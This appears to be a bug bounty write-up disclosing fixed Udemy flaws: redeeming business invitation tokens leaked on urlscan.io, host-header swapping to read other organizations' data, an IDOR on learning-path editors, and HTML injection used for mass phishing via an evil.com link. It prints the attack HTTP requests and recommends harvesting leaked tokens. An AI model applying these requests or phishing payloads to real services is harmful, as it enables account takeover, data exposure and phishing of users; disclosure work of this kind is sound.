From URL dumps digging to IDOR , BAC, Massive Phishing in Udemy

Mostafa Mamdoh
4 min readNov 11, 2021

--

Hey All,

It is my first writeup since i kicked off my cyber security career so lets start,

Recently i was trying some OSINT framework tools when i came across a website malware scanner which was urlscan.io this website scans the url for possibility of being a malware or a phishing website and all submitted scans are archived for public access and you can search for this scans by using the domain name or a keyword of the url. so i started to search randomly for a common websites like twitter ,uber,udemy… maybe i can find a private instances or a less accessible pages for public and i came to https://urlscan.io/search/#page.domain:udemy.com and some urls got my attention that was *.udemy.com/?data=token *.udemy.com/organization/accept-invitation/?email=token

Broken Access Control — Udemy

The urls were an invitations for business accounts that belongs to many companies which uses Udemy For Business , These invitations were continuously leaked from time to time on malware scanners as these companies users were scanning the invitation urls for malware.

The bug was working as anyone would claim these invitations without any extra verification to make sure if the intended user was the real one who redeem it.

Invitation Redeem

They fixed it by requiring an extra verification

Information Disclosure-Udemy

Udemy business trial accounts were not showing all business functions or endpoints in their api so i decided to claim one of the tokens to test all possible functionalities and i found a Learning Paths feature.

Learning Paths feature let you as a business organization member either a user or a moderator to create a learning tracks and share it with others in the same organization only.

Every business organization have a handle or a account name which looks like handle.udemy.com which distinct it from other organizations.

Disclosing Organizations Learning Paths

I opened burp and intercepted requests to *.udemy.com/learningpaths and i got :

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“count”:30,”next”:”█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking”,”description”:”Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.”,”owner”:{“_class”:”user”,”id”:█████6538,”display_name”:”█████S”,”image_50x50":”*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S”,”image_50x50":”█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false},}

I changed account name in host header to another organizations account names and got all learning paths created on these organizations with their members data.

I tested the attack vector against other api endpoints which don’t require account id in the request according to their api documention

Disclosing Trial Organizations Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“available_count”: 5, “active_remaining_days”: 0, “owner_email”: “█████”, “trial_limit_reached”: false, “used_count”: 0, “owner_name”: “█████”, “is_owner”: false, “remaining_seats”: 0}

The same attack vector above ,i changed account name in host header to another organizations and i got organizations trial data.

Insecure Direct Object Reference-Udemy

During my testing i noticed a request is sent to

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com
{"added_editors_ids":[],"removed_editors_ids":[]}

I changed learning path id to a random one in the request and added my user id in added_editors_ids the final request looks like :

PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com
{“added_editors_ids”:[
152495920
],”removed_editors_ids”:[]}
HTTP/1.1 200 OK{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}

I was able to add myself as an editor in any learning path in the same or different organization also i could remove any editor from it by adding it’s id in removed_editors_ids values.

Possible Massive Phishing Attack Through Html Injection

I spotted a recommending feature designed especially for members inside same organization , i used burp and got that request

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--

These feature allows you to recommend several users at the same time , i added many user ids to the request , a personal accounts (Non business ones) i created normally from https://www.udemy.com/join/signup-popup/ and i got that mail

Theoretically i was able to send a massive injected phished content to all their users[was nearly 150000000 users at time of reporting] personal or business ones by iterating over their all user Ids as the endpoint didn’t implement rate limiting at that time.

Reports time Line:

  • March 3,2021 — Vulnerabilities reported.
  • April 7,2021–Total Bounties Awarded 1300$
  • August 7,2021 — Reports Resolved

Tips:

  • Use public url archives or scanners to recon for a private instances or a leaked tokens belongs to sensitive features ,Use https://osintframework.com/
  • Try to elevate your content injections impact by chaining it with phishing scenarios

--

--

Mostafa Mamdoh
Mostafa Mamdoh

Written by Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne @ BugCrowd

No responses yet